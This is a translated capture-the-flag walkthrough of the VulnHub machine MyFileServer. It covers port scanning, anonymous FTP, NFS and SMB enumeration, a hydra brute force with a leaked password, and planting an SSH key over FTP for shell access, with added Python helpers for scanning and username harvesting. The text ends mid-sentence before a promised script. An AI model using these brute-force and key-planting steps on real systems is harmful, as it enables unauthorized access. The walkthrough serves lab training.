my_file_server_1 target machine

MyFileServer, a VulnHub target machine of moderate difficulty: an all-round check of file-service penetration fundamentals (Samba, NFS, FTP) finished off with a kernel privilege escalation, plus the ultimate privilege-escalation mindset, a taste of staying graceful right before your composure cracks! - 红队笔记


Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.104
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 06:29 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00013s latency).
Not shown: 64641 filtered tcp ports (no-response), 17 filtered tcp ports (host-prohibited), 869 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
445/tcp open microsoft-ds
2049/tcp open nfs
2121/tcp open ccproxy-ftp
20048/tcp open mountd
MAC Address: 08:00:27:1B:BD:3C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds

Ports 21, 22, 80, 111, 445, 2049, 2121 and 20048 are open. Note the 17 ports reported as filtered (host-prohibited): the host firewall answers with an ICMP admin-prohibited reject rather than dropping silently, which becomes relevant for the FTP data connections later.
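The two-pass pattern used here (a fast full-range scan, then version, script and OS detection only on the ports found open) is easy to script. The following is an added example, not part of the original write-up: it parses nmap's normal output with a regular expression and assembles the second command. The embedded report is a constructed sample in nmap's output format carrying this page's port list, plus one made-up open|filtered line to show that such ports are deliberately left out.

```python
"""Two-pass scan helper: take the open ports from a fast 'nmap --min-rate
10000 -p-' report and build the slower -sV/-sC/-O pass over only those ports.
Added example, not the author's script; the embedded report is a constructed
sample in nmap's normal-output format, carrying this page's port list."""
import re
import shlex

SAMPLE_NMAP_REPORT = """\
Nmap scan report for 192.168.56.104
Host is up (0.00013s latency).
Not shown: 64641 filtered tcp ports (no-response), 869 closed tcp ports (reset)
PORT      STATE         SERVICE
21/tcp    open          ftp
22/tcp    open          ssh
80/tcp    open          http
111/tcp   open          rpcbind
445/tcp   open          microsoft-ds
2049/tcp  open          nfs
2121/tcp  open          ccproxy-ftp
20048/tcp open          mountd
9999/tcp  open|filtered abyss
MAC Address: 08:00:27:1B:BD:3C (Oracle VirtualBox virtual NIC)
"""

_PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)


def open_ports(report: str, proto: str = "tcp") -> list[int]:
    """Ports nmap reported as 'open' for the given protocol, sorted and
    de-duplicated. 'open|filtered' is left out on purpose: nmap could not
    tell, so those belong in a separate, slower confirmation scan."""
    return sorted({int(port) for port, pr, state, _ in _PORT_LINE.findall(report)
                   if pr == proto and state == "open"})


def service_scan_command(target: str, ports: list[int]) -> str:
    """Second pass as run on this page: TCP connect scan with version
    detection, default scripts and OS detection, restricted to the open ports."""
    if not ports:
        raise ValueError("no open ports; nothing to fingerprint")
    return "nmap -sT -sV -O -sC -p{} {}".format(",".join(map(str, ports)), shlex.quote(target))


if __name__ == "__main__":
    found = open_ports(SAMPLE_NMAP_REPORT)
    print(found)
    print(service_scan_command("192.168.56.104", found))
```

Run against a real report saved with nmap -oN; the UDP side (rpcbind, mountd and nlockmgr are all reachable over UDP here) needs its own -sU pass, which the helper supports through the proto argument.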

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p21,22,80,111,445,2049,2121,20048 192.168.56.104
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 06:32 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00040s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
|_http-server-header: Apache/2.4.6 (CentOS)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: My File Server
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 43585/udp nlockmgr
| 100021 1,3,4 47243/tcp6 nlockmgr
| 100021 1,3,4 54710/tcp nlockmgr
| 100021 1,3,4 57541/udp6 nlockmgr
| 100024 1 41099/tcp status
| 100024 1 43507/udp6 status
| 100024 1 53654/tcp6 status
| 100024 1 54065/udp status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
445/tcp open netbios-p Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:1B:BD:3C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 3.X|2.6.X|4.X|5.X (97%), Synology DiskStation Manager 5.X (95%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 3.4 - 3.10 (97%), Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (97%), Linux 3.10 (97%), Synology DiskStation Manager 5.2-5644 (95%), Linux 2.6.32 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.0 - 3.1 (91%), Linux 3.2 - 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FILESERVER; OS: Unix

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-06-23T10:32:47
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -1h50m02s, deviation: 3h10m30s, median: -3s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2023-06-23T16:02:46+05:30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.59 seconds

FTP on port 21 allows anonymous login; port 445 is open; port 2121 is a second FTP service (ProFTPD) that also allows anonymous login; 2049 is NFS; the SMB shares are reachable; the OS is CentOS (Apache 2.4.6 banner).

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p21,22,80,111,445,2049,2121,20048 192.168.56.104
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 06:56 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00025s latency).

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
111/tcp open rpcbind
445/tcp open microsoft-ds
2049/tcp open nfs
2121/tcp open ccproxy-ftp
20048/tcp open mountd
MAC Address: 08:00:27:1B:BD:3C (Oracle VirtualBox virtual NIC)

Host script results:
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 42.85 seconds

The vuln scripts found nothing useful; the smb-vuln-regsvc-dos hit targets the regsvc service of Windows 2000 and is not meaningful against a Samba host.

Checking the web service

Port 80 is open, so take a look, but there is nothing there: neither the page nor its source contains anything special, and all it tells us is that this is a file server.

Brute-force the directories.

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.56.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t64 -x php,txt,sql,rar
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.104/
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,sql,rar
[+] Timeout: 10s
===============================================================
2023/06/23 06:41:20 Starting gobuster in directory enumeration mode
===============================================================
/readme.txt (Status: 200) [Size: 25]
Progress: 1102362 / 1102805 (99.96%)
===============================================================
2023/06/23 06:43:42 Finished
===============================================================

This turned up an unlinked file, readme.txt; opening it shows

My Password is
rootroot1

So now we have a password without knowing what it belongs to. Work through the FTP, SMB and NFS leads gathered earlier (SSH is also an option, but it needs a username, so FTP, SMB and NFS come first): try anonymous FTP login, the SMB enumeration scripts and an NFS mount.

Anonymous FTP login

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.56.104
Connected to 192.168.56.104.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.104]
Name (192.168.56.104:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||33661|)
ftp: Can't connect to `192.168.56.104:33661': No route to host
ftp>
ftp> epsv4 off
EPSV/EPRT on IPv4 off.
ftp> ls
227 Entering Passive Mode (192,168,56,104,131,84).
ftp: Can't connect to `192.168.56.104:33620': No route to host
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 3 root root 16 Feb 19 2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 9 root root 4096 Feb 19 2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 root root 4096 Feb 19 2020 anaconda
drwxr-x--- 2 root root 22 Feb 19 2020 audit
-rw-r--r-- 1 root root 7033 Feb 19 2020 boot.log
-rw------- 1 root root 10752 Feb 19 2020 btmp
-rw-r--r-- 1 root root 9161 Feb 19 2020 cron
-rw-r--r-- 1 root root 31971 Feb 19 2020 dmesg
-rw-r--r-- 1 root root 31971 Feb 19 2020 dmesg.old
drwxr-xr-x 2 root root 6 Feb 19 2020 glusterfs
drwx------ 2 root root 39 Feb 19 2020 httpd
-rw-r--r-- 1 root root 292584 Feb 19 2020 lastlog
-rw------- 1 root root 3764 Feb 19 2020 maillog
-rw------- 1 root root 1423423 Feb 19 2020 messages
drwx------ 2 root root 6 Feb 19 2020 ppp
drwx------ 4 root root 43 Feb 19 2020 samba
-rw------- 1 root root 63142 Feb 19 2020 secure
-rw------- 1 root root 0 Feb 19 2020 spooler
-rw------- 1 root root 0 Feb 19 2020 tallylog
drwxr-xr-x 2 root root 22 Feb 19 2020 tuned
-rw-r--r-- 1 root root 58752 Feb 19 2020 wtmp
-rw------- 1 root root 100 Feb 19 2020 xferlog
-rw------- 1 root root 18076 Feb 19 2020 yum.log
226 Transfer complete

After the anonymous FTP login the listing got no response. A web search solved it, and afterwards I remembered that 红队笔记 had mentioned this: run binary right after logging in to avoid certain errors. The session above shows what the actual fix was, though: the directory listing travels over a separate data connection, and in passive mode (EPSV, then PASV) the client's connection to the announced port (33661, then 33620) was rejected with "No route to host", consistent with the host firewall allowing only 21/tcp and rejecting the rest, as the host-prohibited ports in the nmap scan suggested. Turning passive mode off (epsv4 off, then passive) made the server connect back to the client in active mode, and the listing came through. binary is still worth running before downloading anything, since ASCII mode rewrites line endings in transit, but it has no effect on listings. A quick look showed only a pile of log files; I pulled some usernames out of them by hand and wrote them to a user file for later brute-forcing.
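The same passive/active problem, handled in code: an added example (not the author's commands) using Python's ftplib. The two parsers decode the 227 and 229 replies from the session above so you can see which data port the firewall is rejecting, and the client tries passive mode first and falls back to active mode, exactly what the interactive passive command did. Host, port and the anonymous credentials in the usage line are this page's values.

```python
"""Why the anonymous FTP 'ls' got no listing, and a client that copes with it.
FTP sends directory listings and files over a second TCP connection. In
passive mode (PASV/EPSV) the server announces a port and the client connects
to it; if the host firewall only allows 21/tcp that connection is rejected
("No route to host" when the reject is an ICMP host-prohibited). In active
mode the server connects back to the client instead. Added example, not the
author's code."""
import ftplib
import re

_PASV = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
_EPSV = re.compile(r"\(\|\|\|(\d+)\|\)")


def parse_pasv(reply: str) -> tuple[str, int]:
    """Decode '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)'. The data port
    is p1*256 + p2: that is the port to look for in the firewall rules."""
    m = _PASV.search(reply)
    if not m:
        raise ValueError(f"not a PASV reply: {reply!r}")
    h1, h2, h3, h4, p1, p2 = map(int, m.groups())
    if p1 > 255 or p2 > 255:
        raise ValueError("malformed port octets")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def parse_epsv(reply: str) -> int:
    """Decode '229 Entering Extended Passive Mode (|||port|)'."""
    m = _EPSV.search(reply)
    if not m:
        raise ValueError(f"not an EPSV reply: {reply!r}")
    return int(m.group(1))


def list_with_fallback(host: str, port: int = 21, user: str = "anonymous",
                       password: str = "anonymous@") -> tuple[str, list[str]]:
    """Log in, list the current directory and return (mode, entries).
    Passive mode is tried first; if its data connection cannot be opened the
    client switches to active mode (PORT). Active mode needs the attacker
    host to accept the server's inbound data connection, so make sure no
    local firewall blocks it."""
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=10)
    ftp.login(user, password)
    try:
        for mode in ("passive", "active"):
            ftp.set_pasv(mode == "passive")
            entries: list[str] = []
            try:
                ftp.retrlines("LIST", entries.append)
                return mode, entries
            except (OSError, ftplib.error_temp):
                if mode == "active":
                    raise
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()
    raise RuntimeError("unreachable")


if __name__ == "__main__":
    mode, entries = list_with_fallback("192.168.56.104")
    print(mode)
    print("\n".join(entries))
```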

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ cat user
smbuser
smbdata
root
gluster
dbus
stapusr
stapsys
stapdev
input
systemd-network
printadmin
wbpriv

Also, my attentiveness during information gathering was still lacking here: the last line of the secure log contains smbuser's password, and the sshd_config file states that password login is not permitted and names the public-key directory.
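Pulling names out of the logs by hand doesn't scale. Below is an added example (not the author's code) that harvests accounts from CentOS-style /var/log/secure records: useradd and groupadd entries (where names like stapusr, gluster and smbuser come from), sshd's "Accepted ... for <user>" lines, and sshd's "invalid user" lines, which tell you which names do not exist and should be dropped from the brute-force list. The log lines are constructed for the example in the format those daemons write; they are not the contents of the target's log.

```python
"""Harvest account names from CentOS-style /var/log/secure records for a
brute-force user list. Added example, not the author's code; the log lines
below are constructed in the format useradd, groupadd and sshd write and are
not the target's real log."""
import re

SAMPLE_SECURE_LOG = """\
Feb 18 06:40:12 localhost groupadd[2231]: new group: name=stapusr, GID=156
Feb 18 06:40:12 localhost groupadd[2236]: new group: name=stapsys, GID=157
Feb 18 06:40:12 localhost groupadd[2240]: new group: name=stapdev, GID=158
Feb 18 06:41:03 localhost useradd[2301]: new user: name=gluster, UID=995, GID=993, home=/run/gluster, shell=/sbin/nologin
Feb 19 02:12:44 fileserver useradd[3010]: new user: name=smbuser, UID=1000, GID=1000, home=/home/smbuser, shell=/bin/bash
Feb 19 02:13:01 fileserver sshd[3100]: Accepted password for smbuser from 192.168.56.1 port 50122 ssh2
Feb 19 02:15:20 fileserver sshd[3122]: Failed password for invalid user admin from 192.168.56.1 port 50130 ssh2
Feb 19 02:16:02 fileserver sshd[3130]: Accepted publickey for root from 192.168.56.1 port 50140 ssh2
"""

_NEW_ACCOUNT = re.compile(
    r"(?:useradd|groupadd)\[\d+\]: new (user|group): name=([^,\s]+)(?:.*\bshell=(\S+))?")
_SSHD_AUTH = re.compile(
    r"sshd\[\d+\]: (?:Accepted|Failed) \S+ for (invalid user )?(\S+) from ")

INTERACTIVE_SHELLS = ("/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/bash")


def harvest_accounts(log: str) -> dict[str, set[str]]:
    """Return users, groups, names seen authenticating over SSH, names with an
    interactive shell, and names sshd flagged as non-existent."""
    found: dict[str, set[str]] = {
        k: set() for k in ("users", "groups", "ssh_seen", "interactive", "nonexistent")}
    for line in log.splitlines():
        m = _NEW_ACCOUNT.search(line)
        if m:
            kind, name, shell = m.groups()
            found["users" if kind == "user" else "groups"].add(name)
            if shell in INTERACTIVE_SHELLS:
                found["interactive"].add(name)
        m = _SSHD_AUTH.search(line)
        if m:
            invalid, name = m.groups()
            found["nonexistent" if invalid else "ssh_seen"].add(name)
    return found


def user_wordlist(found: dict[str, set[str]]) -> list[str]:
    """Candidates for hydra -L: names sshd called invalid are dropped,
    accounts with an interactive shell come first (those are the ones an
    SSH or FTP login is most useful for), then the rest alphabetically.
    Group names are kept too; service setups often create matching users."""
    names = (found["interactive"] | found["users"] | found["ssh_seen"]
             | found["groups"]) - found["nonexistent"]
    return sorted(names, key=lambda n: (n not in found["interactive"], n))


if __name__ == "__main__":
    print("\n".join(user_wordlist(harvest_accounts(SAMPLE_SECURE_LOG))))
```

Feed it the real file (for example the secure file fetched from the smbdata share) and write the result to the user file used with hydra below.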

NFS mount

Now NFS.

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.56.104
Export list for 192.168.56.104:
/smbdata 192.168.56.0/24

The export is open to the whole 192.168.56.0/24 subnet, so mount it on Kali (the mount point /tmp/infosec has to exist first).

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.56.104:/smbdata /tmp/infosec
[sudo] password for kali:

┌──(kali㉿kali)-[~]
└─$ cd /tmp/infosec

┌──(kali㉿kali)-[/tmp/infosec]
└─$ ls
anaconda boot.log cron dmesg.old lastlog messages samba spooler tallylog wtmp yum.log
audit btmp dmesg glusterfs maillog ppp secure sshd_config tuned xferlog

Isn't this just the same log data as before?

SMB access

Now SMB; sudo smbmap -H IP also works for this.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse -p445 192.168.56.104
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-23 06:43 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00018s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:1B:BD:3C (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-users:
| FILESERVER\smbuser (RID: 1000)
| Full name:
| Description:
|_ Flags: Normal user account
| smb-enum-shares:
| account_used: <blank>
| \\192.168.56.104\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Samba 4.9.1)
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| \\192.168.56.104\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\drivers
| Anonymous access: <none>
| \\192.168.56.104\smbdata:
| Type: STYPE_DISKTREE
| Comment: smbdata
| Users: 0
| Max Users: <unlimited>
| Path: C:\smbdata
| Anonymous access: READ/WRITE
| \\192.168.56.104\smbuser:
| Type: STYPE_DISKTREE
| Comment: smbuser
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\smbuser\
|_ Anonymous access: <none>

Nmap done: 1 IP address (1 host up) scanned in 27.11 seconds

The script output lists the shares smbdata and smbuser (smbdata allows anonymous read and write, smbuser allows no anonymous access); try both with smbclient.

┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.56.104/smbuser
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.56.104/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 23 06:43:28 2023
.. D 0 Tue Feb 18 06:47:54 2020
anaconda D 0 Tue Feb 18 06:48:15 2020
audit D 0 Tue Feb 18 06:48:15 2020
boot.log N 6120 Tue Feb 18 06:48:16 2020
btmp N 384 Tue Feb 18 06:48:16 2020
cron N 4813 Tue Feb 18 06:48:16 2020
dmesg N 31389 Tue Feb 18 06:48:16 2020
dmesg.old N 31389 Tue Feb 18 06:48:16 2020
glusterfs D 0 Tue Feb 18 06:48:16 2020
lastlog N 292292 Tue Feb 18 06:48:16 2020
maillog N 1982 Tue Feb 18 06:48:16 2020
messages N 684379 Tue Feb 18 06:48:17 2020
ppp D 0 Tue Feb 18 06:48:17 2020
samba D 0 Tue Feb 18 06:48:17 2020
secure N 11937 Tue Feb 18 06:48:17 2020
spooler N 0 Tue Feb 18 06:48:17 2020
tallylog N 0 Tue Feb 18 06:48:17 2020
tuned D 0 Tue Feb 18 06:48:17 2020
wtmp N 25728 Tue Feb 18 06:48:17 2020
xferlog N 100 Tue Feb 18 06:48:17 2020
yum.log N 10915 Tue Feb 18 06:48:17 2020
sshd_config N 3906 Wed Feb 19 02:46:38 2020

19976192 blocks of size 1024. 18153160 blocks available
smb: \> pwd
Current directory is \\192.168.56.104\smbdata\

One share refuses the connection; the other holds the same logs we saw before, plus sshd_config, which did not appear in the FTP listing.

Brute forcing

The password we found hasn't been useful yet, so combine it with the user list gathered earlier and try SSH first.

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ hydra -L user -P passwd 192.168.56.104 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-25 05:30:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:13/p:1), ~1 try per task
[DATA] attacking ssh://192.168.56.104:22/
[ERROR] target ssh://192.168.56.104:22/ does not support password authentication (method reply 36).

Apparently password login isn't supported; come back to that later. Try FTP brute-forcing.

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ hydra -L user -P passwd 192.168.56.104 ftp
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-25 05:32:14
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:13/p:1), ~1 try per task
[DATA] attacking ftp://192.168.56.104:21/
[21][ftp] host: 192.168.56.104 login: smbuser password: rootroot1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-25 05:32:18

So FTP also has an smbuser account, and its password is the one from readme.txt; log in with it.

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ ftp 192.168.56.104
Connected to 192.168.56.104.
220 (vsFTPd 3.0.2)
Name (192.168.56.104:kali): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /home/smbuser
ftp> ls -liah
drwx------ 2 1000 1000 79 Feb 18 2020 .
drwxr-xr-x 3 0 0 20 Feb 19 2020 ..
-rw------- 1 1000 1000 27 Feb 20 2020 .bash_history
-rw-r--r-- 1 1000 1000 18 Mar 05 2015 .bash_logout
-rw-r--r-- 1 1000 1000 193 Mar 05 2015 .bash_profile
-rw-r--r-- 1 1000 1000 231 Mar 05 2015 .bashrc

Digging around, the only oddity is the permission set on sshd_config (world-writable, under /etc/ssh); the passwd file also confirms that only smbuser and root have a bash login shell.

ftp> ls -laih
drwxr-xr-x 2 0 0 4096 Feb 20 2020 .
drwxr-xr-x 86 0 0 8192 Feb 20 2020 ..
-rw-r--r-- 1 0 0 581843 Aug 09 2019 moduli
-rw-r--r-- 1 0 0 2276 Aug 09 2019 ssh_config
-rw-r----- 1 0 999 227 Feb 19 2020 ssh_host_ecdsa_key
-rw-r--r-- 1 0 0 162 Feb 19 2020 ssh_host_ecdsa_key.pub
-rw-r----- 1 0 999 387 Feb 19 2020 ssh_host_ed25519_key
-rw-r--r-- 1 0 0 82 Feb 19 2020 ssh_host_ed25519_key.pub
-rw-r----- 1 0 999 1679 Feb 19 2020 ssh_host_rsa_key
-rw-r--r-- 1 0 0 382 Feb 19 2020 ssh_host_rsa_key.pub
-rwxrwxrwx 1 0 0 3929 Feb 20 2020 sshd_config

At first I assumed the idea was to edit sshd_config, but changes had no effect: sshd reads its configuration only at start-up or on reload, and we cannot restart it (a world-writable sshd_config is still a real weakness, since whatever is written there takes effect as root at the next restart). So the other route: upload a public key and log in over SSH. The relevant line from sshd_config:

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile .ssh/authorized_keys

First generate a key pair with ssh-keygen (run under sudo here, hence the /root/.ssh default path; the pair is saved as smbuser and smbuser.pub in the current directory).

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ sudo ssh-keygen
[sudo] password for kali:
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): smbuser
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in smbuser
Your public key has been saved in smbuser.pub
The key fingerprint is:
SHA256:CRKLhVZPo8026EZ5w3XTuItuKSNdRMjnnsDQQTy200Q root@kali
The key's randomart image is:
+---[RSA 3072]----+
| o+==+E oo |
| oo.%Bo+.... |
| .. B+@O . |
| o +=++.. |
| o =So . |
| . = . |
| . o . |
| . + + |
| . + |
+----[SHA256]-----+

Upload with put. The .ssh directory was not in the earlier listing of /home/smbuser, so it had to be created (ftp's mkdir) before the upload, and smbuser.pub goes up under the name authorized_keys. The file lands as 0644, which sshd's StrictModes accepts: it refuses group- or world-writable files and directories, not world-readable ones.

ftp> pwd
Remote directory: /home/smbuser/.ssh
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||5950|).
150 Ok to send data.
100% |***********************************************************************| 563 4.66 MiB/s 00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (883.92 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||5981|).
150 Here comes the directory listing.
-rw-r--r-- 1 1000 1000 563 Jun 25 10:46 authorized_keys
226 Directory send OK

SSH login with the private key (the target's address had changed to 192.168.56.119 by this point).

┌──(kali㉿kali)-[~/Downloads/myfileserver]
└─$ sudo ssh -i smbuser smbuser@192.168.56.119
The authenticity of host '192.168.56.119 (192.168.56.119)' can't be established.
ED25519 key fingerprint is SHA256:ccn0TgE4/OXtSpg3oMO2gVNYXrps4Zi+XcBgaDZnW78.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.119' (ED25519) to the list of known hosts.
##############################################################################################
# Armour Infosec #
# --------- www.armourinfosec.com ------------ #
# My File Server - 1 #
# Designed By :- Akanksha Sachin Verma #
# Twitter :- @akankshavermasv #
##############################################################################################

Last login: Thu Feb 20 16:42:21 2020
[smbuser@fileserver ~]$ whoami
smbuser
[smbuser@fileserver ~]$ ls
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$ uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
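The key-planting steps above (create .ssh, upload the public key as authorized_keys, log in) done as one script: an added example, not the author's commands, using Python's ftplib. It keeps any authorized_keys entries already present, attempts SITE CHMOD so the directory and file satisfy sshd's StrictModes, and restricts the planted key with from= to the attacker's address (192.168.56.106 in this write-up) so a key left behind cannot be reused from anywhere else. The ssh-ed25519 line used by the self-test is a constructed all-zero dummy, not a real key; the host, user and password in the usage call are this page's values.

```python
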